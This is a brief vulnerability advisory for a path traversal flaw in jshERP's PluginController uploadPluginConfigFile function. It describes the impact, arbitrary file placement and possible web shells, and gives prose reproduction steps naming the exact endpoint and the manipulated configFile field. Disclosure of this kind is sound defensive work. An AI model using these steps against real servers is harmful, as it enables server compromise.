jishenghua jshERP Path Traversal Vulnerability in PluginController

A path traversal vulnerability has been identified in jishenghua jshERP versions through 3.6. The issue arises in the PluginController component, specifically within the uploadPluginConfigFile function. The vulnerability allows for remote exploitation by manipulating the configFile argument, which is processed as a MultipartFile. This manipulation can lead to unauthorized file uploads to the project directory, potentially including malicious files such as web shells.

Impact

Exploitation of this vulnerability allows for path traversal, enabling attackers to upload files to arbitrary locations within the server's file system. This could be used to place malicious files, such as web shells, that could be executed to compromise the server.

Reproduction

To reproduce this vulnerability, send a POST request to the '/jshERP-boot/plugin/uploadPluginConfigFile' endpoint. Include a multipart form-data payload that manipulates the 'configFile' field to traverse directories and upload a file, such as a YAML file, to the server.